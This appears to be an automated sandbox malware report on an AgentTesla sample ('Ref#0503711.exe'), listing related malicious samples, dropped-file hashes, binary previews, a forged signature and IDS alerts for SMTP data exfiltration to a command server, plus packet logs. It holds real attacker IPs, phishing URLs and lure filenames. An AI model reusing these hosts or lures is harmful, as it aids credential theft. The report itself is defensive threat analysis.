                                                              Ship_Doc_18505.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Booking-103.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Ref Cheque 705059.vbeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              INVOICE AA MARINE CONTRACTING 92900202002-PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Request For Quote document.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              REF DOCUMENTS.jsGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              CLOUDFLARENETUSNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                                              • 172.67.212.190
                                                              https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 104.21.90.101
                                                              CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                              • 172.67.139.158
                                                              CLOUDFLARENETUSNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                                              • 172.67.212.190
                                                              https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 104.21.90.101
                                                              CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                              • 172.67.139.158

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0escan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              wrong bank details.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              Payment.vbsGet hashmaliciousFormBookBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\docdd.exe.log

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):1058
                                                              Entropy (8bit):5.356262093008712
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                              MD5:B2EFBF032531DD2913F648E75696B0FD
                                                              SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                              SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                              SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                              C:\Users\user\AppData\Local\Temp\docdd.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Ref#0503711.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):6.129581635319933
                                                              Encrypted:false
                                                              SSDEEP:768:U+6OFUXSLepRRtsCt4pX5yjYeK1rZbsOK/C5o4iqNSc348v4Devsoe+gcIAMkYh:P6OFUXSLep7tsGEX5OK1rZbsO559iJcQ
                                                              MD5:DBD0E17845DA07384D942B76268CF5B7
                                                              SHA1:C1FCA3C8AB7E6D60FE3703A4EE52BBAC1D61E6AD
                                                              SHA-256:4A9A9156581680F9B5082C685A656994A2248FF274900710014CA9C3C7868DB8
                                                              SHA-512:F7697D93690F3BD673501401B4286CF4794B39563E5D1707AF5BD407E2ACB2CBA8F3331E0DF9091F0CC4895155AC9BE9AA89668F92B33A9319EA25551B876F8C
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g................................. ........@.. ....................... ............`.................................d...W.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..........t5..........X................................................0..........(Y...*.*.0..o....... BE'.. .`..Y.s.............s........Y....o...........-.s.............o....... f.L.a.afefeffeef. Zx.sX.Yffefeefeffea...-..+...o........,.. .).f.Y.Xfeffefefea...-..+...o.............(....(....,... e.x.X.Y.Xa.~.....`.....8.......(....,T....(....,&.. ..xua.Xffefeeffe.Ya...~....`.....+G.~....`....... .Ex.X.Yffeeffefea.+$~......`...... ...y.Y.affeeffefe.Ya.~.....X.....*..0......

                                                              C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2474944
                                                              Entropy (8bit):7.754828034068089
                                                              Encrypted:false
                                                              SSDEEP:49152:CJdEishAFuQlec9L4mpYmFJq+o1LYYVRC8kKK:MqXAct9mFJq3KYXC8BK
                                                              MD5:1590A3EFB4A143305E7182FBD284A414
                                                              SHA1:4B1910FC583442A94A7A246C5424354991E22F13
                                                              SHA-256:B11EC3F1E913B4C0CAEAF24B194998E7702DA6C0B30AFC8A147DF52B26FD829F
                                                              SHA-512:6B34BB151902E7C0A9AC349D16BE5EBE23C4574FD1B4131D63691AB7B8771BECCF2044DB85B5714FC90DA15FB0C4029313A174497FC85652E1E6A4C084F010F7
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.................."...........".. ........@.. ........................&...........`...................................".W....."...............%..)....%...................................................... ............... ..H............text.....".. ...."................. ..`.rsrc.........".......".............@..@.reloc........%.......%.............@..B..................".....H.......Ll!.hU...........O...............................................0..........(....*.*..(....*.0..=.........(....-..(....-..(....-...#........3.#........*#.............7v..#........6i..+%(....,.#........*....(....X...X....X...2.....YY#.......?..ZC....(....,.#........*....(....X...X.8......5q..#........4d..+%(....,.#........*....(....X...X....X...0...e..YY#.........Z6/(....,.#........*....(....X...X.+...3....(....*..l[*....0..A.........(....-..(....-..(....-...#........

                                                              C:\Users\user\AppData\Roaming\ioibrzb.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Ref#0503711.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:modified
                                                              Size (bytes):2474944
                                                              Entropy (8bit):7.754828034068089
                                                              Encrypted:false
                                                              SSDEEP:49152:CJdEishAFuQlec9L4mpYmFJq+o1LYYVRC8kKK:MqXAct9mFJq3KYXC8BK
                                                              MD5:1590A3EFB4A143305E7182FBD284A414
                                                              SHA1:4B1910FC583442A94A7A246C5424354991E22F13
                                                              SHA-256:B11EC3F1E913B4C0CAEAF24B194998E7702DA6C0B30AFC8A147DF52B26FD829F
                                                              SHA-512:6B34BB151902E7C0A9AC349D16BE5EBE23C4574FD1B4131D63691AB7B8771BECCF2044DB85B5714FC90DA15FB0C4029313A174497FC85652E1E6A4C084F010F7
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.................."...........".. ........@.. ........................&...........`...................................".W....."...............%..)....%...................................................... ............... ..H............text.....".. ...."................. ..`.rsrc.........".......".............@..@.reloc........%.......%.............@..B..................".....H.......Ll!.hU...........O...............................................0..........(....*.*..(....*.0..=.........(....-..(....-..(....-...#........3.#........*#.............7v..#........6i..+%(....,.#........*....(....X...X....X...2.....YY#.......?..ZC....(....,.#........*....(....X...X.8......5q..#........4d..+%(....,.#........*....(....X...X....X...0...e..YY#.........Z6/(....,.#........*....(....X...X.+...3....(....*..l[*....0..A.........(....-..(....-..(....-...#........

                                                              C:\Users\user\AppData\Roaming\ioibrzb.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Ref#0503711.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.635119590192788
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Ref#0503711.exe
                                                              File size:1'907'648 bytes
                                                              MD5:3b2e54913c8b29ce886c8b36f8dd0cfc
                                                              SHA1:ff514c4f55dc70f5d1914fcf7118f24fd636e8a2
                                                              SHA256:405832c40918da8ad82482319361d443a19cb05d8834e0258e5c54bf11faae84
                                                              SHA512:c872c307a060c3ec9b026d24f159447d74de06a5e2e73f5729c9360c5f20b0dc1afe17c870793309f4bddd6c1ec52ce68a1dca9c0b102d089ab48a6db7071c81
                                                              SSDEEP:49152:RFXZRd8cSc710RxibZkpQuiQcWpn0JGgKD:/XPmct7uMqn0QD
                                                              TLSH:DB95BE3E699D4DA6EACF57B9848E4928F3EB584B8E438F1D13C16DEB118230524C2D5F
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d..g................................. ........@.. .......................@............`................................

                                                              File Icon

                                                              Icon Hash:929296929e9e8e73

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x5a1afe
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6703BA64 [Mon Oct 7 10:39:32 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Authenticode Signature

                                                              Signature Valid:false
                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                              Signature Validation Error:The digital signature of the object did not verify
                                                              Error Number:-2146869232
                                                              Not Before, Not After
                                                              • 04/05/2022 01:00:00 05/05/2024 00:59:59
                                                              Subject Chain
                                                              • CN="VMware, Inc.", O="VMware, Inc.", L=Palo Alto, S=California, C=US, SERIALNUMBER=2853894, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                              Version:3
                                                              Thumbprint MD5:E952656E95A95C1449C2A741130267B5
                                                              Thumbprint SHA-1:0AD116E8D49DCC487A04FAC2FBCCB53FD6721013
                                                              Thumbprint SHA-256:3518995D983C041C80E4EBDD664252B6D2AE342B305B4A3A1611FC4FC501E0EB
                                                              Serial:08579742A953BAD90D4237A3F3E38C5E

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1a1aa80x53.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a20000x2f200.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1cf2000x29c0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d20000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x19fb040x19fc00d1c72163e293239f76c5a4663af69624False0.807054034500902data7.6840259996063836IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x1a20000x2f2000x2f200c0adcbd9cab2b173e07b3aa1b225b555False0.36255077088859416data6.24104888819665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x1d20000xc0x200c16ff1f7b417519c6461311f332e3b69False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x1a22b00x709ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9976066597294485
                                                              RT_ICON0x1a93500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.17033893292322252
                                                              RT_ICON0x1b9b780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.271415808282531
                                                              RT_ICON0x1c30200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.3012014787430684
                                                              RT_ICON0x1c84a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.28259329239489844
                                                              RT_ICON0x1cc6d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.38558091286307056
                                                              RT_ICON0x1cec780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.4598968105065666
                                                              RT_ICON0x1cfd200x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5704918032786885
                                                              RT_ICON0x1d06a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6631205673758865
                                                              RT_GROUP_ICON0x1d0b100x84data0.7272727272727273
                                                              RT_VERSION0x1d0b940x396big endian ispell hash file (?),0.42919389978213507
                                                              RT_MANIFEST0x1d0f2c0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-07T18:05:56.019610+02002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449733162.254.34.31587TCP
                                                              2024-10-07T18:05:56.019610+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449733162.254.34.31587TCP
                                                              2024-10-07T18:07:33.489717+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449733162.254.34.31587TCP
                                                              2024-10-07T18:07:33.489717+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449733162.254.34.31587TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 7, 2024 18:05:52.082645893 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.082681894 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.082737923 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.089056015 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.089108944 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.089169025 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.095520973 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.095541954 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.097733021 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.097754002 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.553829908 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.553921938 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.558875084 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.558887005 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.559262037 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.577260971 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.577344894 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.581406116 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.581433058 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.581743002 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.614059925 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.619791985 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.629815102 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.641731024 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.667403936 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.687417030 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.761493921 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.761662960 CEST44349732172.67.74.152192.168.2.4
                                                              Oct 7, 2024 18:05:52.761720896 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.767673016 CEST49732443192.168.2.4172.67.74.152
                                                              Oct 7, 2024 18:05:52.888390064 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.888525963 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.888616085 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.888684988 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.888706923 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.888797998 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.888855934 CEST49731443192.168.2.4104.21.56.249
                                                              Oct 7, 2024 18:05:52.888864040 CEST44349731104.21.56.249192.168.2.4
                                                              Oct 7, 2024 18:05:52.888911963 CEST49731443192.168.2.4104.21.56.249
